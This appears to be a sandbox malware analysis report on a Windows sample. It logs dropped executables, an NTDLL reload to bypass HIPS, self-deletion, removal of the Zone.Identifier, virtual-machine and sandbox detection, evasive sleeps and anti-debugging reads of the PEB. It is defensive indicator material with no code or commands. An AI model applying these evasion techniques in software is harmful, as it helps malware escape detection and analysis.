Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\sfiueca
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\cviueca
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\eviueca
Drops PE files
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\sfiueca
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\97A5.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\69B5.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\32BC.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\86B8.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\75B0.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\eviueca
Source: C:\Users\user\AppData\Local\Temp\32BC.exe File created: C:\Users\user\AppData\LocalLow\sqlite3.dll
Source: C:\Users\user\AppData\Local\Temp\5D4.exe File created: C:\Users\user\AppData\Local\Temp\0a4fc5b5-fef6-4ac6-8dad-72b92a431021\AdvancedRun.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\8746.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\5D4.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\8E8B.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\cviueca
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\192F.exe
Source: C:\Users\user\AppData\Local\Temp\192F.exe File created: C:\Users\user\AppData\Local\Temp\1105.tmp
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\EDD.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\89D7.exe
Source: C:\Users\user\AppData\Local\Temp\319A.exe File created: C:\Users\user\AppData\Local\Temp\3c9b9832-1586-402f-8df1-a3ced6cc50c2\AdvancedRun.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\319A.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\7428.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\6DDE.exe
Source: C:\Users\user\AppData\Local\Temp\0a4fc5b5-fef6-4ac6-8dad-72b92a431021\AdvancedRun.exe Code function: 32_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle, 32_2_00401306

Hooking and other Techniques for Hiding and Protection:

DLL reload attack detected
Source: C:\Users\user\AppData\Local\Temp\192F.exe Module Loaded: Original DLL: C:\USERS\user\APPDATA\LOCAL\TEMP\1105.TMP reload: C:\WINDOWS\SYSWOW64\NTDLL.DLL
Deletes itself after installation
Source: C:\Windows\explorer.exe File deleted: c:\users\user\desktop\skb6zj6h3n.exe
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Roaming\cviueca:Zone.Identifier read attributes | delete
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\AppData\Local\Temp\0a4fc5b5-fef6-4ac6-8dad-72b92a431021\AdvancedRun.exe Code function: 32_2_00408E31 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 32_2_00408E31
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\97A5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\97A5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\97A5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\97A5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EDD.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\192F.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\319A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\0a4fc5b5-fef6-4ac6-8dad-72b92a431021\AdvancedRun.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\69B5.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\32BC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\3c9b9832-1586-402f-8df1-a3ced6cc50c2\AdvancedRun.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM3
Source: Yara match File source: Process Memory Space: 5D4.exe PID: 5344, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: 97A5.exe, 00000014.00000002.368885108.00000000004D9000.00000004.00000020.sdmp, 192F.exe, 0000001D.00000002.419614740.000000000321A000.00000004.00000020.sdmp Binary or memory string: ASWHOOK
Checks if the current machine is a virtual machine (disk enumeration)
Source: C:\Users\user\Desktop\SkB6zJ6H3N.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\97A5.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\cviueca Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\192F.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\192F.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\192F.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\192F.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\192F.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\192F.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B5.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\69B5.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\69B5.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\69B5.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\69B5.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\69B5.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Renames NTDLL to bypass HIPS
Source: C:\Users\user\AppData\Local\Temp\192F.exe File opened: C:\Windows\SysWOW64\ntdll.dll
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\explorer.exe TID: 4672 Thread sleep count: 576 > 30
Source: C:\Windows\explorer.exe TID: 3008 Thread sleep count: 184 > 30
Source: C:\Windows\explorer.exe TID: 5672 Thread sleep count: 258 > 30
Source: C:\Windows\explorer.exe TID: 6524 Thread sleep count: 344 > 30
Source: C:\Windows\explorer.exe TID: 6512 Thread sleep count: 95 > 30
Source: C:\Windows\explorer.exe TID: 6520 Thread sleep count: 144 > 30
Source: C:\Windows\explorer.exe TID: 3828 Thread sleep count: 311 > 30
Source: C:\Windows\explorer.exe TID: 5796 Thread sleep count: 77 > 30
Source: C:\Users\user\AppData\Local\Temp\32BC.exe TID: 6624 Thread sleep time: -90000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6744 Thread sleep time: -922337203685477s >= -30000s
Contains long sleeps (>= 3 min)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 576
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5595
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2723
Found dropped PE file which has not been started or loaded
Source: C:\Windows\explorer.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75B0.exe
Source: C:\Windows\explorer.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\86B8.exe
Source: C:\Windows\explorer.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\8746.exe
Source: C:\Windows\explorer.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\8E8B.exe
Source: C:\Windows\explorer.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\89D7.exe
Source: C:\Windows\explorer.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\7428.exe
Source: C:\Windows\explorer.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\6DDE.exe
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A946B90 rdtsc 29_2_6A946B90
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: explorer.exe, 00000007.00000000.286192637.0000000008A32000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000007.00000000.286192637.0000000008A32000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000007.00000000.302034474.0000000008C73000.00000004.00000001.sdmp Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000007.00000000.301288378.0000000008B88000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000007.00000000.301288378.0000000008B88000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
Source: explorer.exe, 00000007.00000000.281934992.00000000048E0000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000007.00000000.270521490.0000000008ACF000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000Datc
Source: explorer.exe, 00000007.00000000.301288378.0000000008B88000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C
Source: explorer.exe, 00000007.00000000.270521490.0000000008ACF000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000007.00000000.296961123.00000000069DA000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD002
Source: AdvancedRun.exe, 0000002A.00000002.494181317.0000000000799000.00000004.00000020.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
Source: explorer.exe, 00000007.00000000.264799560.0000000000F73000.00000004.00000020.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}osoft S
Source: AdvancedRun.exe, 0000002A.00000002.494181317.0000000000799000.00000004.00000020.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y
Source: C:\Users\user\Desktop\SkB6zJ6H3N.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\SkB6zJ6H3N.exe System information queried: ModuleInformation

Anti Debugging:

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Source: C:\Users\user\Desktop\SkB6zJ6H3N.exe System information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Local\Temp\97A5.exe System information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Roaming\cviueca System information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Local\Temp\192F.exe System information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Local\Temp\69B5.exe System information queried: CodeIntegrityInformation
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\SkB6zJ6H3N.exe Code function: 0_2_004267E0 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_004267E0
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\SkB6zJ6H3N.exe Code function: 0_2_02E0E36A push dword ptr fs:[00000030h] 0_2_02E0E36A
Source: C:\Users\user\AppData\Local\Temp\97A5.exe Code function: 19_2_02E7D4F2 push dword ptr fs:[00000030h] 19_2_02E7D4F2
Source: C:\Users\user\AppData\Roaming\cviueca Code function: 22_2_02C70042 push dword ptr fs:[00000030h] 22_2_02C70042
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94D294 mov eax, dword ptr fs:[00000030h] 29_2_6A94D294
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94DA88 mov eax, dword ptr fs:[00000030h] 29_2_6A94DA88
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A92AAB0 mov eax, dword ptr fs:[00000030h] 29_2_6A92AAB0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9412BD mov esi, dword ptr fs:[00000030h] 29_2_6A9412BD
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9412BD mov eax, dword ptr fs:[00000030h] 29_2_6A9412BD
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A911AA0 mov eax, dword ptr fs:[00000030h] 29_2_6A911AA0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A945AA0 mov eax, dword ptr fs:[00000030h] 29_2_6A945AA0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9152A5 mov eax, dword ptr fs:[00000030h] 29_2_6A9152A5
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9E8ADD mov eax, dword ptr fs:[00000030h] 29_2_6A9E8ADD
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A915AC0 mov eax, dword ptr fs:[00000030h] 29_2_6A915AC0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A913ACA mov eax, dword ptr fs:[00000030h] 29_2_6A913ACA
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A942ACB mov eax, dword ptr fs:[00000030h] 29_2_6A942ACB
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A942AE4 mov eax, dword ptr fs:[00000030h] 29_2_6A942AE4
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D4AEF mov eax, dword ptr fs:[00000030h] 29_2_6A9D4AEF
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A915210 mov eax, dword ptr fs:[00000030h] 29_2_6A915210
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A915210 mov ecx, dword ptr fs:[00000030h] 29_2_6A915210
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A933A1C mov eax, dword ptr fs:[00000030h] 29_2_6A933A1C
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9CD208 mov eax, dword ptr fs:[00000030h] 29_2_6A9CD208
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A928A0A mov eax, dword ptr fs:[00000030h] 29_2_6A928A0A
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A918239 mov eax, dword ptr fs:[00000030h] 29_2_6A918239
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A914A20 mov eax, dword ptr fs:[00000030h] 29_2_6A914A20
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A99EA20 mov eax, dword ptr fs:[00000030h] 29_2_6A99EA20
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93A229 mov eax, dword ptr fs:[00000030h] 29_2_6A93A229
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9A4257 mov eax, dword ptr fs:[00000030h] 29_2_6A9A4257
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A912240 mov ecx, dword ptr fs:[00000030h] 29_2_6A912240
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A912240 mov eax, dword ptr fs:[00000030h] 29_2_6A912240
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A919240 mov eax, dword ptr fs:[00000030h] 29_2_6A919240
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9A4248 mov eax, dword ptr fs:[00000030h] 29_2_6A9A4248
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A95927A mov eax, dword ptr fs:[00000030h] 29_2_6A95927A
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9CB260 mov eax, dword ptr fs:[00000030h] 29_2_6A9CB260
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9E8A62 mov eax, dword ptr fs:[00000030h] 29_2_6A9E8A62
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91F395 mov eax, dword ptr fs:[00000030h] 29_2_6A91F395
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A914B94 mov edi, dword ptr fs:[00000030h] 29_2_6A914B94
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9BEB8A mov ecx, dword ptr fs:[00000030h] 29_2_6A9BEB8A
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9BEB8A mov eax, dword ptr fs:[00000030h] 29_2_6A9BEB8A
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D138A mov eax, dword ptr fs:[00000030h] 29_2_6A9D138A
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9CD380 mov ecx, dword ptr fs:[00000030h] 29_2_6A9CD380
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9E9BBE mov eax, dword ptr fs:[00000030h] 29_2_6A9E9BBE
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9E8BB6 mov eax, dword ptr fs:[00000030h] 29_2_6A9E8BB6
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D1BA8 mov eax, dword ptr fs:[00000030h] 29_2_6A9D1BA8
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A944BAD mov eax, dword ptr fs:[00000030h] 29_2_6A944BAD
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9953CA mov eax, dword ptr fs:[00000030h] 29_2_6A9953CA
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A923BF4 mov eax, dword ptr fs:[00000030h] 29_2_6A923BF4
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A923BF4 mov ecx, dword ptr fs:[00000030h] 29_2_6A923BF4
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9123F6 mov eax, dword ptr fs:[00000030h] 29_2_6A9123F6
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A911BE9 mov eax, dword ptr fs:[00000030h] 29_2_6A911BE9
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93DBE9 mov eax, dword ptr fs:[00000030h] 29_2_6A93DBE9
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9C23E3 mov ecx, dword ptr fs:[00000030h] 29_2_6A9C23E3
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9C23E3 mov eax, dword ptr fs:[00000030h] 29_2_6A9C23E3
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D131B mov eax, dword ptr fs:[00000030h] 29_2_6A9D131B
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93A309 mov eax, dword ptr fs:[00000030h] 29_2_6A93A309
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9CE33D mov eax, dword ptr fs:[00000030h] 29_2_6A9CE33D
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9A4320 mov eax, dword ptr fs:[00000030h] 29_2_6A9A4320
